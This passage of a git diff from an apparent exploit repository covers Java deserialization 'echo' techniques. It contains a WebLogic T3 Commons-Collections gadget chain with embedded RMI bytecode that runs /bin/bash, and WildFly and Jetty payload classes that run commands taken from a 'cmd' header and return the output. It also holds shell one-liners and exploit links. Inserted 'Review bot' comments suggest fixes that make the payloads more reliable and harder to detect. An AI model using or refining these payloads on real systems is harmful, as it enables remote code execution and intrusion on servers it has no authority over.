110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 102, 102, 101, 114, 59, 1, 0, 4, 108, 105, 110, 101, 1, 0, 22, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 121, 112, 101, 84, 97, 98, 108, 101, 1, 0, 36, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 7, 0, 116, 7, 0, 117, 7, 0, 97, 7, 0, 118, 7, 0, 101, 7, 0, 107, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 36, 82, 101, 109, 111, 116, 101, 73, 109, 112, 108, 46, 106, 97, 118, 97, 32, 102, 114, 111, 109, 32, 73, 110, 112, 117, 116, 70, 105, 108, 101, 79, 98, 106, 101, 99, 116, 12, 0, 34, 0, 35, 1, 0, 27, 99, 111, 109, 47, 116, 101, 115, 116, 47, 112, 97, 121, 108, 111, 97, 100, 47, 82, 101, 109, 111, 116, 101, 73, 109, 112, 108, 1, 0, 27, 106, 97, 118, 97, 120, 47, 110, 97, 109, 105, 110, 103, 47, 73, 110, 105, 116, 105, 97, 108, 67, 111, 110, 116, 101, 120, 116, 1, 
0, 4, 89, 52, 101, 114, 7, 0, 119, 12, 0, 120, 0, 121, 12, 0, 60, 0, 61, 1, 0, 19, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 122, 0, 35, 1, 0, 19, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 65, 114, 114, 97, 121, 76, 105, 115, 116, 1, 0, 9, 47, 98, 105, 110, 47, 98, 97, 115, 104, 7, 0, 117, 12, 0, 123, 0, 124, 1, 0, 2, 45, 99, 1, 0, 24, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 12, 0, 34, 0, 125, 12, 0, 126, 0, 127, 12, 0, -128, 0, -127, 1, 0, 22, 106, 97, 118, 97, 47, 105, 111, 47, 66, 117, 102, 102, 101, 114, 101, 100, 82, 101, 97, 100, 101, 114, 1, 0, 25, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 82, 101, 97, 100, 101, 114, 7, 0, 118, 12, 0, -126, 0, -125, 12, 0, 34, 0, -124, 12, 0, 34, 0, -123, 1, 0, 22, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 102, 102, 101, 114, 12, 0, -122, 0, -121, 12, 0, -120, 0, -119, 1, 0, 1, 10, 12, 0, -118, 0, -121, 12, 0, -117, 0, -121, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 46, 119, 101, 98, 108, 111, 103, 105, 99, 47, 99, 108, 117, 115, 116, 101, 114, 47, 115, 105, 110, 103, 108, 101, 116, 111, 110, 47, 67, 108, 117, 115, 116, 101, 114, 77, 97, 115, 116, 101, 114, 82, 101, 109, 111, 116, 101, 1, 0, 24, 106, 97, 118, 97, 47, 114, 109, 105, 47, 82, 101, 109, 111, 116, 101, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 14, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 20, 106, 97, 118, 97, 120, 47, 110, 97, 109, 105, 110, 103, 47, 67, 111, 110, 116, 101, 120, 116, 1, 0, 6, 114, 101, 98, 105, 110, 100, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 
110, 103, 59, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 3, 97, 100, 100, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 90, 1, 0, 19, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 59, 41, 86, 1, 0, 19, 114, 101, 100, 105, 114, 101, 99, 116, 69, 114, 114, 111, 114, 83, 116, 114, 101, 97, 109, 1, 0, 29, 40, 90, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 115, 116, 97, 114, 116, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 24, 40, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 41, 86, 1, 0, 19, 40, 76, 106, 97, 118, 97, 47, 105, 111, 47, 82, 101, 97, 100, 101, 114, 59, 41, 86, 1, 0, 8, 114, 101, 97, 100, 76, 105, 110, 101, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 44, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 102, 102, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 10, 103, 101, 116, 77, 101, 115, 115, 97, 103, 101, 0, 33, 0, 2, 0, 32, 0, 1, 0, 33, 0, 0, 0, 4, 0, 1, 0, 34, 0, 35, 0, 1, 0, 36, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 37, 0, 0, 0, 6, 0, 1, 0, 0, 0, 14, 0, 38, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 39, 0, 40, 0, 0, 0, 9, 0, 41, 0, 42, 0, 1, 0, 36, 0, 0, 0, -81, 0, 3, 0, 3, 0, 0, 0, 
42, -69, 0, 2, 89, -73, 0, 3, 76, -69, 0, 4, 89, -73, 0, 5, 77, 44, 18, 6, 43, -71, 0, 7, 3, 0, 43, 42, 3, 50, -74, 0, 8, 87, -89, 0, 8, 77, 44, -74, 0, 10, -79, 0, 1, 0, 8, 0, 33, 0, 36, 0, 9, 0, 3, 0, 37, 0, 0, 0, 34, 0, 8, 0, 0, 0, 17, 0, 8, 0, 19, 0, 16, 0, 20, 0, 25, 0, 21, 0, 33, 0, 24, 0, 36, 0, 22, 0, 37, 0, 23, 0, 41, 0, 25, 0, 38, 0, 0, 0, 42, 0, 4, 0, 16, 0, 17, 0, 43, 0, 44, 0, 2, 0, 37, 0, 4, 0, 45, 0, 46, 0, 2, 0, 0, 0, 42, 0, 47, 0, 48, 0, 0, 0, 8, 0, 34, 0, 49, 0, 40, 0, 1, 0, 50, 0, 0, 0, 19, 0, 2, -1, 0, 36, 0, 2, 7, 0, 51, 7, 0, 52, 0, 1, 7, 0, 53, 4, 0, 1, 0, 54, 0, 55, 0, 2, 0, 36, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 37, 0, 0, 0, 6, 0, 1, 0, 0, 0, 31, 0, 38, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 39, 0, 40, 0, 0, 0, 0, 0, 1, 0, 56, 0, 57, 0, 1, 0, 0, 0, 1, 0, 47, 0, 57, 0, 2, 0, 58, 0, 0, 0, 4, 0, 1, 0, 59, 0, 1, 0, 60, 0, 61, 0, 2, 0, 36, 0, 0, 1, 126, 0, 5, 0, 8, 0, 0, 0, 124, -69, 0, 11, 89, -73, 0, 12, 77, 44, 18, 13, -71, 0, 14, 2, 0, 87, 44, 18, 15, -71, 0, 14, 2, 0, 87, 44, 43, -71, 0, 14, 2, 0, 87, -69, 0, 16, 89, 44, -73, 0, 17, 78, 45, 4, -74, 0, 18, 87, 45, -74, 0, 19, 58, 4, -69, 0, 20, 89, -69, 0, 21, 89, 25, 4, -74, 0, 22, -73, 0, 23, -73, 0, 24, 58, 5, -69, 0, 25, 89, -73, 0, 26, 58, 6, 25, 5, -74, 0, 27, 89, 58, 7, -58, 0, 19, 25, 6, 25, 7, -74, 0, 28, 18, 29, -74, 0, 28, 87, -89, -1, -24, 25, 6, -74, 0, 30, -80, 77, 44, -74, 0, 31, -80, 0, 1, 0, 0, 0, 117, 0, 118, 0, 9, 0, 4, 0, 37, 0, 0, 0, 58, 0, 14, 0, 0, 0, 38, 0, 8, 0, 40, 0, 17, 0, 41, 0, 26, 0, 42, 0, 34, 0, 44, 0, 43, 0, 45, 0, 49, 0, 46, 0, 55, 0, 48, 0, 76, 0, 49, 0, 85, 0, 52, 0, 96, 0, 53, 0, 112, 0, 56, 0, 118, 0, 57, 0, 119, 0, 58, 0, 38, 0, 0, 0, 92, 0, 9, 0, 8, 0, 110, 0, 62, 0, 63, 0, 2, 0, 43, 0, 75, 0, 64, 0, 65, 0, 3, 0, 55, 0, 63, 0, 66, 0, 67, 0, 4, 0, 76, 0, 42, 0, 68, 0, 69, 0, 5, 0, 85, 0, 33, 0, 70, 0, 71, 0, 6, 0, 93, 0, 25, 0, 72, 0, 57, 0, 7, 0, 119, 0, 5, 0, 45, 0, 46, 0, 2, 0, 0, 0, 124, 0, 39, 0, 40, 0, 0, 0, 0, 0, 124, 0, 56, 0, 
57, 0, 1, 0, 73, 0, 0, 0, 12, 0, 1, 0, 8, 0, 110, 0, 62, 0, 74, 0, 2, 0, 50, 0, 0, 0, 52, 0, 3, -1, 0, 85, 0, 7, 7, 0, 52, 7, 0, 75, 7, 0, 76, 7, 0, 77, 7, 0, 78, 7, 0, 79, 7, 0, 80, 0, 0, -4, 0, 26, 7, 0, 75, -1, 0, 5, 0, 2, 7, 0, 52, 7, 0, 75, 0, 1, 7, 0, 53, 0, 58, 0, 0, 0, 4, 0, 1, 0, 59, 0, 1, 0, 81, 0, 0, 0, 2, 0, 82,
+ };
+
+ public static void main(String[] args) {
+ try {
+ String url = "t3://" + host + ":" + port;
+ // 安装RMI实例
+ invokeRMI(classname, bs);
+
+ Environment environment = new Environment();
+ environment.setProviderUrl(url);
+ environment.setEnableServerAffinity(false);
+ environment.setSSLClientTrustManager(new WeblogicTrustManager());
+ Context context = environment.getInitialContext();
+ ClusterMasterRemote remote = (ClusterMasterRemote) context.lookup("Y4er");
+
+ // 调用RMI实例执行命令
+ String res = remote.getServerLocation("ifconfig");
+ System.out.println(res);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ }
+
+ private static void invokeRMI(String className, byte[] clsData) throws Exception {
+ // common-collection1 构造transformers 定义自己的RMI接口
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(DefiningClassLoader.class),
+ new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
+ new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
+ new InvokerTransformer("defineClass",
+ new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
+ new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}),
+ new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{null}}),
+ new ConstantTransformer(new HashSet())};
+
+ final Transformer transformerChain = new ChainedTransformer(transformers);
+ final Map innerMap = new HashMap();
+
+ final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+ InvocationHandler handler = (InvocationHandler) Reflections
+ .getFirstCtor(
+ "sun.reflect.annotation.AnnotationInvocationHandler")
+ .newInstance(Override.class, lazyMap);
+
+ final Map mapProxy = Map.class
+ .cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(),
+ new Class[]{Map.class}, handler));
+
+ handler = (InvocationHandler) Reflections.getFirstCtor(
+ "sun.reflect.annotation.AnnotationInvocationHandler")
+ .newInstance(Override.class, mapProxy);
+
+ // 序列化数据 MarshalledObject绕过
+ Object obj = new MarshalledObject(handler);
+ ByteArrayOutputStream out = new ByteArrayOutputStream();
+ ObjectOutputStream objOut = new ObjectOutputStream(out);
+ objOut.writeObject(obj);
+ objOut.flush();
+ objOut.close();
+ byte[] payload = out.toByteArray();
+ // t3发送
+ T3ProtocolOperation.send(host, port, payload);
+ }
+}
+```
+#### weblogic
+
+https://xz.aliyun.com/t/5299
+
+https://github.com/lufeirider/CVE-2019-2725
+
+
+### 通过写文件
+linux
+```bash
+// 进入test.html的根目录并执行id命令写入1.txt
+cd $(find -name "test.html" -type f -exec dirname {} \; | sed 1q) && echo `id` > 1.txt
+```
+win
+```bash
+$file = Get-ChildItem -Path . -Filter test.html -recurse -ErrorAction SilentlyContinue;$f = -Join($file.DirectoryName,"/a.txt");echo 222 |Out-File $f
+```
+
+### Apereo CAS 回显
+
+https://www.00theway.org/2020/01/04/apereo-cas-rce/
+
+https://www.freebuf.com/vuls/226149.html
+
+
+org.springframework.webflow.context.ExternalContextHolder.getExternalContext()方法可以获取到上下文关联信息,然后通过getNativeRequest()方法获取request对象通过getNativeResponse()方法获取response对象。同时提及到org.springframework.cglib.core.ReflectUtils.defineClass().newInstance();加载payload。猜测大佬的想法是通过defineClass从byte[]还原出一个Class对象,该恶意对象主要是执行命令,获取response对象,将执行命令后的结果通过response对象的输出流输出。
+
+参考代码实现:https://github.com/potats0/CasExp/blob/master/src/main/java/payloads/exploitType/exploitDump.java
+
+
+
+>参考:
+>
+>[Java 反序列化回显的多种姿势](https://www.joyk.com/dig/detail/1624894461629758)
+>
+>[Java Web代码执行漏洞回显总结](https://l3yx.github.io/2020/03/31/Java-Web%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%9B%9E%E6%98%BE%E6%80%BB%E7%BB%93/)
+>
+>[通杀漏洞利用回显方法-linux平台](https://www.00theway.org/2020/01/17/java-god-s-eye/)
+>
+>[linux下java反序列化通杀回显方法的低配版实现](https://xz.aliyun.com/t/7307)
+>
+>[Tomcat中一种半通用回显方法](https://xz.aliyun.com/t/7348)
+>
+>[Java反射-修改字段值, 反射修改static final修饰的字段](https://www.cnblogs.com/noKing/p/9038234.html)
+>
+>[基于全局储存的新思路 | Tomcat的一种通用回显方法研究](https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247484799&idx=1&sn=42e7807d6ea0d8917b45e8aa2e4dba44)
+>
+>[tomcat不出网回显连续剧第六集](https://xz.aliyun.com/t/7535)
+>
+>[前尘——返回执行结果的回显链](https://www.anquanke.com/post/id/253661)
+>
+>[Weblogic使用ClassLoader和RMI来回显命令执行结果](https://xz.aliyun.com/t/7228)
+>[JAVA反序列化回显学习](https://cangqingzhe.github.io/2020/12/17/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9B%9E%E6%98%BE%E5%AD%A6%E4%B9%A0/)
diff --git "a/java\345\233\236\346\230\276/WildFly/Echo_ServletRequestContext.java" "b/java\345\233\236\346\230\276/WildFly/Echo_ServletRequestContext.java"
new file mode 100644
index 0000000..4dc7b8e
--- /dev/null
+++ "b/java\345\233\236\346\230\276/WildFly/Echo_ServletRequestContext.java"
@@ -0,0 +1,68 @@
+package com.firebasky.exp;
+
+/**
+ * TargetObject = {java.lang.Thread}
+ * ---> threadLocals = {java.lang.ThreadLocal$ThreadLocalMap}
+ * ---> table = {class [Ljava.lang.ThreadLocal$ThreadLocalMap$Entry;}
+ * ---> [59] = {java.lang.ThreadLocal$ThreadLocalMap$Entry}
+ * ---> value = {io.undertow.servlet.handlers.ServletRequestContext}
+ */
+
+import java.lang.reflect.Method;
+
+/**
+ * WildFly 回显
+ */
+public class Echo_ServletRequestContext {
+ static {
+ try {
+ getResponse();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+ public static void getResponse() throws Exception {
+ Thread thread = Thread.currentThread();
+ java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("threadLocals");
+ threadLocals.setAccessible(true);
+ Object threadLocalMap = threadLocals.get(thread);
+
+ Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap");
+ java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("table");
+ tableField.setAccessible(true);
+ Object[] objects = (Object[]) tableField.get(threadLocalMap);
+
+ Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry");
+ java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("value");
+ entryValueField.setAccessible(true);
+
+ for (Object object : objects) {
+ if (object != null) {
+ Object valueObject = entryValueField.get(object);
+ if (valueObject != null) {
+ if (valueObject.getClass().getName().equals("io.undertow.servlet.handlers.ServletRequestContext")) {
+ //response
+ Method getServletResponse = valueObject.getClass().getDeclaredMethod("getServletResponse");
+ getServletResponse.setAccessible(true);
+ Object response = getServletResponse.invoke(valueObject);
+ //request
+ Method getServletRequest = valueObject.getClass().getDeclaredMethod("getServletRequest");
+ getServletRequest.setAccessible(true);
+ Object request = getServletRequest.invoke(valueObject);
+ //echo
+ java.io.PrintWriter writer = (java.io.PrintWriter) response.getClass().getMethod("getWriter").invoke(response);
+ Method getHeader = request.getClass().getMethod("getHeader",String.class);
+ String cmd1 = (String) getHeader.invoke(request, "cmd");
+ String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1};
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+ writer.write("by Firebasky:");
+ writer.write("\n"+output);
+ writer.close();
+ }
+ }
+ }
+ }
+ }
+}
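Review bot: `cmd1` on the `String[] cmd = ...` line is used without a null check, so a request that reaches this payload without a `cmd` header builds `{"sh","-c",null}` and `Runtime.exec` throws a NullPointerException that the static initializer's `catch (Exception e)` merely prints to the server's stderr; add `if (cmd1 == null || cmd1.isEmpty()) { writer.write("by Firebasky: missing cmd header"); writer.close(); return; }` before the exec. Only stdout is read from the process, so a failing command produces an empty echo with no hint why; `java.io.InputStream in = new ProcessBuilder(cmd).redirectErrorStream(true).start().getInputStream();` captures stderr as well. The reflective `setAccessible(true)` on `Thread.threadLocals` and `ThreadLocalMap.table` is presumably blocked by strong encapsulation on JDK 16+ unless the JVM runs with `--add-opens java.base/java.lang=ALL-UNNAMED`, and the resulting `InaccessibleObjectException` would also be swallowed by the same catch; a comment to that effect at the top of `getResponse()` would save the next user a silent failure. The loop also keeps iterating after `writer.close()`, so a `break` after the echo avoids a second write on an already closed writer if more than one matching entry exists.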
diff --git "a/java\345\233\236\346\230\276/java\345\233\236\346\230\276.iml" "b/java\345\233\236\346\230\276/java\345\233\236\346\230\276.iml"
new file mode 100644
index 0000000..82fb2f5
--- /dev/null
+++ "b/java\345\233\236\346\230\276/java\345\233\236\346\230\276.iml"
@@ -0,0 +1,89 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git "a/java\345\233\236\346\230\276/jetty/Echo_HttpConnection.java" "b/java\345\233\236\346\230\276/jetty/Echo_HttpConnection.java"
new file mode 100644
index 0000000..5b3f557
--- /dev/null
+++ "b/java\345\233\236\346\230\276/jetty/Echo_HttpConnection.java"
@@ -0,0 +1,75 @@
+package com.firebasky.exp;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+import java.lang.reflect.Method;
+
+/**
+ * jetty回显
+ */
+public class Echo_HttpConnection extends AbstractTranslet {
+ static {
+ try {
+ getResponse();
+ Runtime.getRuntime().exec("calc");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+ public static void getResponse() throws Exception {
+ Thread thread = Thread.currentThread();
+ java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("threadLocals");
+ threadLocals.setAccessible(true);
+ Object threadLocalMap = threadLocals.get(thread);
+
+ Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap");
+ java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("table");
+ tableField.setAccessible(true);
+ Object[] objects = (Object[]) tableField.get(threadLocalMap);
+
+ Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry");
+ java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("value");
+ entryValueField.setAccessible(true);
+
+ for (Object object : objects) {
+ if (object != null) {
+ Object valueObject = entryValueField.get(object);
+ if (valueObject != null) {
+ if (valueObject.getClass().getName().equals("org.eclipse.jetty.server.HttpConnection")) {
+ Method getHttpChannel = valueObject.getClass().getDeclaredMethod("getHttpChannel");
+ getHttpChannel.setAccessible(true);
+ Object httpChannel = getHttpChannel.invoke(valueObject);
+ Class> HttpChannel = httpChannel.getClass();
+
+ Object request = HttpChannel.getMethod("getRequest").invoke(httpChannel);
+ Object response = HttpChannel.getMethod("getResponse").invoke(httpChannel);
+ java.io.PrintWriter writer = (java.io.PrintWriter) response.getClass().getMethod("getWriter").invoke(response);
+ Method getHeader = request.getClass().getMethod("getHeader",String.class);
+ String cmd1 = (String) getHeader.invoke(request, "cmd");
+ String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1};
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+ writer.write("by Firebasky:");
+ writer.write("\n"+output);
+ writer.close();
+ }
+ }
+ }
+ }
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
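Review bot: `Runtime.getRuntime().exec("calc");` in the static initializer looks like a leftover local test: it runs unconditionally after `getResponse()` on every target that loads the class, is Windows-only (on Linux it throws an IOException that is only printed to the server's stderr), and spawns an extra process-creation event that defenders can key on; drop it so the payload does only what the `cmd` header asks. As in the WildFly variant, `cmd1` is not null-checked before building the command array, and only stdout is read; `if (cmd1 == null || cmd1.isEmpty()) { writer.close(); return; }` plus `new ProcessBuilder(cmd).redirectErrorStream(true).start().getInputStream()` fixes both. `Class> HttpChannel = httpChannel.getClass();` is presumably `Class<?> HttpChannel` with the `<?` lost in rendering; the raw file should be checked, since as printed it does not compile. A `break` after `writer.close()` would also stop the loop from writing to a closed writer should a second matching entry exist.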
diff --git "a/java\345\233\236\346\230\276/mvnw" "b/java\345\233\236\346\230\276/mvnw"
new file mode 100644
index 0000000..a16b543
--- /dev/null
+++ "b/java\345\233\236\346\230\276/mvnw"
@@ -0,0 +1,310 @@
+#!/bin/sh
+# ----------------------------------------------------------------------------
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements. See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership. The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License. You may obtain a copy of the License at
+#
+# https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations
+# under the License.
+# ----------------------------------------------------------------------------
+
+# ----------------------------------------------------------------------------
+# Maven Start Up Batch script
+#
+# Required ENV vars:
+# ------------------
+# JAVA_HOME - location of a JDK home dir
+#
+# Optional ENV vars
+# -----------------
+# M2_HOME - location of maven2's installed home dir
+# MAVEN_OPTS - parameters passed to the Java VM when running Maven
+# e.g. to debug Maven itself, use
+# set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+# MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+# ----------------------------------------------------------------------------
+
+if [ -z "$MAVEN_SKIP_RC" ] ; then
+
+ if [ -f /etc/mavenrc ] ; then
+ . /etc/mavenrc
+ fi
+
+ if [ -f "$HOME/.mavenrc" ] ; then
+ . "$HOME/.mavenrc"
+ fi
+
+fi
+
+# OS specific support. $var _must_ be set to either true or false.
+cygwin=false;
+darwin=false;
+mingw=false
+case "`uname`" in
+ CYGWIN*) cygwin=true ;;
+ MINGW*) mingw=true;;
+ Darwin*) darwin=true
+ # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
+ # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
+ if [ -z "$JAVA_HOME" ]; then
+ if [ -x "/usr/libexec/java_home" ]; then
+ export JAVA_HOME="`/usr/libexec/java_home`"
+ else
+ export JAVA_HOME="/Library/Java/Home"
+ fi
+ fi
+ ;;
+esac
+
+if [ -z "$JAVA_HOME" ] ; then
+ if [ -r /etc/gentoo-release ] ; then
+ JAVA_HOME=`java-config --jre-home`
+ fi
+fi
+
+if [ -z "$M2_HOME" ] ; then
+ ## resolve links - $0 may be a link to maven's home
+ PRG="$0"
+
+ # need this for relative symlinks
+ while [ -h "$PRG" ] ; do
+ ls=`ls -ld "$PRG"`
+ link=`expr "$ls" : '.*-> \(.*\)$'`
+ if expr "$link" : '/.*' > /dev/null; then
+ PRG="$link"
+ else
+ PRG="`dirname "$PRG"`/$link"
+ fi
+ done
+
+ saveddir=`pwd`
+
+ M2_HOME=`dirname "$PRG"`/..
+
+ # make it fully qualified
+ M2_HOME=`cd "$M2_HOME" && pwd`
+
+ cd "$saveddir"
+ # echo Using m2 at $M2_HOME
+fi
+
+# For Cygwin, ensure paths are in UNIX format before anything is touched
+if $cygwin ; then
+ [ -n "$M2_HOME" ] &&
+ M2_HOME=`cygpath --unix "$M2_HOME"`
+ [ -n "$JAVA_HOME" ] &&
+ JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
+ [ -n "$CLASSPATH" ] &&
+ CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
+fi
+
+# For Mingw, ensure paths are in UNIX format before anything is touched
+if $mingw ; then
+ [ -n "$M2_HOME" ] &&
+ M2_HOME="`(cd "$M2_HOME"; pwd)`"
+ [ -n "$JAVA_HOME" ] &&
+ JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
+fi
+
+if [ -z "$JAVA_HOME" ]; then
+ javaExecutable="`which javac`"
+ if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
+ # readlink(1) is not available as standard on Solaris 10.
+ readLink=`which readlink`
+ if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
+ if $darwin ; then
+ javaHome="`dirname \"$javaExecutable\"`"
+ javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
+ else
+ javaExecutable="`readlink -f \"$javaExecutable\"`"
+ fi
+ javaHome="`dirname \"$javaExecutable\"`"
+ javaHome=`expr "$javaHome" : '\(.*\)/bin'`
+ JAVA_HOME="$javaHome"
+ export JAVA_HOME
+ fi
+ fi
+fi
+
+if [ -z "$JAVACMD" ] ; then
+ if [ -n "$JAVA_HOME" ] ; then
+ if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
+ # IBM's JDK on AIX uses strange locations for the executables
+ JAVACMD="$JAVA_HOME/jre/sh/java"
+ else
+ JAVACMD="$JAVA_HOME/bin/java"
+ fi
+ else
+ JAVACMD="`which java`"
+ fi
+fi
+
+if [ ! -x "$JAVACMD" ] ; then
+ echo "Error: JAVA_HOME is not defined correctly." >&2
+ echo " We cannot execute $JAVACMD" >&2
+ exit 1
+fi
+
+if [ -z "$JAVA_HOME" ] ; then
+ echo "Warning: JAVA_HOME environment variable is not set."
+fi
+
+CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
+
+# traverses directory structure from process work directory to filesystem root
+# first directory with .mvn subdirectory is considered project base directory
+find_maven_basedir() {
+
+ if [ -z "$1" ]
+ then
+ echo "Path not specified to find_maven_basedir"
+ return 1
+ fi
+
+ basedir="$1"
+ wdir="$1"
+ while [ "$wdir" != '/' ] ; do
+ if [ -d "$wdir"/.mvn ] ; then
+ basedir=$wdir
+ break
+ fi
